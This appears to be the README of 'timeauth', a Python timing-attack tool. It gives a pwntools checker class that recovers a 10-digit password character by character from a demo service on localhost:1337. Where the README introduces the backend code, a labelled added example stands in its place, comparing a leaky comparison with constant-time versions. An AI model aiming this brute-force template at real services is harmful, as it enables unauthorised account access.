timeauth: Python Time Based Authentication Attack Tool

Time Authentication Attack Tool

Installation

> git clone git@github.com:SakiiR/timeauth.git
[…]
> pip install ./timeauth/

Usage

Suppose we have a TCP service listening on localhost:1337 and waiting for a password. What if the code behind this service was written by a weird developer, checks your input character by character, and sleeps each time it checks a character (or performs a BIG action on the server that takes some time)?

> nc localhost 1337

Hello !
password please: SakiiR
Bad Password ! BYE BYE
[!] Closed connection ..

And the following backend password verification:
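A check of the kind described above next to a fixed-work version, as an added example that is not the service's or the project's own code. The secret, the function names and the step counter are constructed for illustration; the counter stands in for the per-character delay.

```python
import hashlib
import hmac

SECRET = b"4815162342"  # constructed sample token: 10 digits, as in the checker below


def leaky_check(candidate, secret=SECRET):
    """Early-exit compare. Returns (ok, comparisons); each comparison stands
    for one slow per-character step on the server."""
    if len(candidate) != len(secret):
        return False, 0
    steps = 0
    for got, want in zip(candidate, secret):
        steps += 1
        if got != want:
            return False, steps  # work done reveals the matching prefix length
    return True, steps


def fixed_work_check(candidate, secret=SECRET):
    """Same verdict, but always walks the whole secret and never exits early."""
    steps = 0
    diff = len(candidate) ^ len(secret)
    padded = candidate.ljust(len(secret), b"\0")
    for got, want in zip(padded, secret):
        steps += 1
        diff |= got ^ want  # accumulate differences instead of branching
    return diff == 0, steps


def production_check(candidate, secret=SECRET):
    """What to deploy: compare fixed-size digests with hmac.compare_digest."""
    return hmac.compare_digest(hashlib.sha256(candidate).digest(),
                               hashlib.sha256(secret).digest())


def work_profile(check, secret=SECRET, upto=4):
    """Comparisons performed for guesses with 0..upto-1 correct leading chars."""
    profile = []
    for k in range(upto):
        guess = secret[:k] + b"x" * (len(secret) - k)  # 'x' never matches a digit
        profile.append(check(guess, secret)[1])
    return profile


if __name__ == "__main__":
    print("leaky:", work_profile(leaky_check))
    print("fixed:", work_profile(fixed_work_check))
    print("ok:", production_check(SECRET), production_check(b"0000000000"))
```

The leaky profile grows with every correct leading character while the fixed-work profile stays flat, which is the property a password or token comparison needs.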

This package makes exploiting this kind of service faster: you only need to implement a single class.

Example:

from pwn import remote, context

from timeauth import TimeAuthChecker


class ExampleChecker(TimeAuthChecker):

    def __init__(self):
        # Name the class explicitly: super(self.__class__, ...) recurses
        # forever as soon as this class is subclassed.
        super(ExampleChecker, self).__init__(
            charset="0123456789",
            token_length=10,
            hidden_char="*"
        )

    def request(self):
        # Send the current candidate token and wait for the service to close
        # the connection.
        context.log_level = 'error'  # silence pwntools connection logs
        s = remote('localhost', 1337)
        s.recvuntil(':')
        s.sendline(self.get_token())
        s.readall()
        s.close()
        context.log_level = 'info'


if __name__ == "__main__":
    a = ExampleChecker()
    a.process()
    a.print_token()

Copyright (c) 2017 SakiiR

Source: https://github.com/SakiiR/